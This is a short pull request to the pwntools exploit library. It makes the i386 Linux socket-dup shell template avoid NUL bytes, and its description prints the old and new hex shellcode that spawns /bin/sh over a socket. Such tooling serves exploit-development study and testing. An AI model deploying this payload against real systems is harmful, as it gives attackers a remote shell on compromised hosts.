### PR TITLE
Fix dupsh NUL bytes and make it shorter

### DIFF
--- a/pwnlib/shellcraft/templates/i386/linux/dup.asm
+++ b/pwnlib/shellcraft/templates/i386/linux/dup.asm
@@ -9,7 +9,8 @@ Args: [sock (imm/reg) = ebp]
   looplabel = common.label("loop")
 %>
 ${dup}:
-        mov ebx, ${sock}
+        push ${sock}
+        pop ebx
         push 3
         pop ecx
 


### PR DESCRIPTION
The `mov` can generate NUL bytes.
## Old

```
$ shellcraft i386.linux.dupsh 3
bb030000006a0359496a3f58cd8075f831c9f7e96a01fe0c24682f2f7368682f62696eb00b89e3cd80
```
## New

```
$ shellcraft i386.linux.dupsh 3
6a035b6a0359496a3f58cd8075f831c9f7e96a01fe0c24682f2f7368682f62696eb00b89e3cd80
```
